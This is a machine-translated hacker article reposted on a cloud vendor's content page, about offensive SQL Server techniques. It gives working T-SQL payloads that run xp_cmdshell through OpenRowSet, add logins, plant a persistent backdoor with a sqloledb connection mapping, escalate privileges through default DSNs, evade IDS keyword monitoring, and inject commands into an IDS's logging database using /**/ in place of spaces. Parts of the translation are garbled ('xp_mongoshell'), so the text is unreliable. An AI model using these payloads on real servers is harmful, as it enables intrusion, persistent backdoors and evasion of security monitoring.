Note the SQL Injection skills that are easy to ignore.

Source: Internet
Author: User
Next, I want to talk about some new sqlserver bugs. Although I have worked hard for a long time, I am also lucky to find out that I am afraid to be exclusive. I will ask you to identify them.

1. About OpenRowSet and OpenDataSource

Maybe this technique has already been used, that is, to use OpenRowSet to send local commands. Generally, our usage is (including the msdn columns) as follows:

Select * From OpenRowSet ('sqloledb', 'myserver'; 'sa'; '', 'select * from
Table ')

Visible (even literally) OpenRowSet is only used as a fast remote database access. It must be followed by select, that is, A recordset must be returned.

So can we use it to call xp_mongoshell? The answer is yes!

Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'set fmtonly off
Exec master. DBO. xp_mongoshel l ''dir c :\''')

Set fmtonly off must be added to prevent the default setting of only returned column information. In this way, the output set returned by xp_cmdshell is submitted to the previous SELECT statement. If the default setting is used, if an empty set is returned, the SELECT statement fails and the command cannot be executed.

So if we want to call sp_addlogin, it will not return any set like xp_cmdshell, so we can no longer rely on fmtonly settings. The following operations can be performed:

Select * From OpenRowSet ('sqloledb', 'server'; 'sa'; '', 'select' OK! ''
Exec master. DBO. sp_addlogin hectic ')

In this way, the command will return at least select OK! ', Your machine Chamber of Commerce shows OK !, At the same time, the other party's database will also add a hectic account, that is, we use

Select 'OK! The returned set of 'spoofed the local select request. It means that the command can be executed normally. You can also perform this operation using SP_ADDSRVROLEMEMBER and OpenDataSource! As for the real use of this method, let's take a look.

2. msdasql two requests

I wonder if you have tried to connect to a remote database using msdasql. Of course, this API must be called by the SQL server administrator, as shown below:

Select * From OpenRowSet ('msdasql ', 'driver = {SQL
Server}; server = server; address = server, 1433; uid = sa; Pwd =; database = Master; Network = dbmssocn ','s
Elect * From Table1 select * From Table2 ')

When the number of fields in Table 1 and Table 2 is different, you will find that the of the other party crashes and local connection fails, and the system resource usage is normal. after killing the sqlserver process with pskill, if you do not restart the machine, sqlserver can either fail to start normally or often encounter illegal operations. I just happened to find this bug. I have not found the specific cause yet, it is strange that this phenomenon only occurs on msdasql, and sqloledb does not. It seems that the problem is not that the number of request sets does not match the number of returned sets, it should be the problem of msdasql. Let's take a closer look at the specific cause.
3. Terrible Backdoor

In the past, it was said on the Internet that webshells can be added to sqlserver by adding triger, jobs, or rewriting sp_addlogin and SP_ADDSRVROLEMEMBER. These methods are feasible, but they are easy to be discovered. I wonder if you have thought about the local connection ing of sqloledb. For example, you can use the Administrator account of sqlserver to execute the following command on the opposite sqlserver:

Select * From OpenRowSet ('sqloledb', 'trusted _ connection = yes; Data
Source = hectic ', 'set fmtonly off exec master .. xp_mongoshell ''dir C :\''')

In this way, a local connection ing named hectic is established on the of the other party. As long as sqlserver is not restarted, The ing will continue to exist, at least I still don't know how to find the connection ing put by others. Well, after running the above command, you will find that even if sqlserver is a guest user without any permissions, you can also run the preceding command! And the permission is LocalSystem! (Default installation) haha! This method can be used to leave a backdoor on sqlserver, which has been intruded into and obtained administrator permissions. The above method is passed on sqlserver2000 sqlserver2000sp1!

There is another guess. Do you know whether you have noticed the two DSN attached to Windows by default? One is localserver and the other is msqi. When the two are created, the local administrator account is used to connect to sqlserver, if the of the other party is started through a custom power user, the SA permission is the same as that of the power user, and it is difficult to make a difference, but we use the following command:

Select * From OpenRowSet
('Msdasql ', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off Exec
Master .. xp_mongoshell ''dir c :\''')

You should be able to use the Administrator account of localserver to connect to the local sqlserver and then execute local commands with the permissions of this account. After that, I thought I should be able to break through the SA's power user permissions. The problem is that sqloledb cannot call the DSN connection, while msdasql is not called by the Administrator. Therefore, I am looking for a guest method to call msdasql.

If someone knows how to break through the bug or has a new idea, we can discuss it together. If the bug can be successfully used by guest, it will be a very serious security vulnerability. Because any SQL statement we mentioned above can be submitted to the other party's ASP for execution.

4. Using T-SQL to cheat IDs or attack IDS

IDS has become increasingly intelligent. Some IDs are added to the xp_mongoshell sp_addlogin monitoring, but after all, artificial intelligence has not appeared today. Such monitoring is always a lie.

Let's talk about spoofing IDs first.

IDS:

Declare @ A sysname set @ A = "XP _" "shell" Exec @ a' dir c :\'

ThisCodeI believe everyone can understand that xp_mongoshell, as a store procedure, has an ID number in the master database, which is fixed. We can also do this:

Assume that this ID = 988456

Declare @ A sysname select @ A = Name from sysobjects where id = 988456
Exec @ A 'dir c :\'

Of course, you can also:

Declare @ A sysname select @ A = Name from sysobjects where id = 988455 1
Exec @ A 'dir c :\'

In this way, IDS cannot perform full monitoring at all. Similarly, sp_addlogin can do the same.
Attack IDS

Because IDs has a large amount of data, it is usually backed up to a conventional database from day to day, such as SQL Server.

If you use the old recordset. addnew will seriously affect the performance of IDs. Because t-SQL requests through ADO are not only highly efficient, but some work can be done by SQL Server. GenerallyProgramWrite as follows:

Insert table values ('Day to content ',...)

So let's think about it. If you use temp ') exec xp_mongoshell 'dir c: \' -- after submission, it will become:

Insert table values ('Day to content'... 'temp ') exec xp_1_shell' dir
C :\'--')

In this way, xp_mongoshell can be run in the IDS Database. Of course, IDS is a sniffing tool that captures all the messages and changes spaces when submitted by the browser. Therefore, the command is submitted to SQL Server, so that your command cannot be executed. The only method is:

Insert/**/table/**/values ('Day to content '.... 'temp ')/**/exec/**/xp_cmdshell/**/'dir c :\'/**/--')

Use/**/instead of space as the delimiter so that your T-SQL can be executed in the IDS Database. You can also use other statements to back up IDs databases to your shared directory.

In fact, the principle of this method is the same as that of attacking ASP, but the space is changed /**/. If ASP is a SELECT statement, 'can be used to block it. Now IDs uses the insert statement, so ') is used for blocking.

Well, you can think about many other new intrusion statements. The best test tool is query analyzer.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.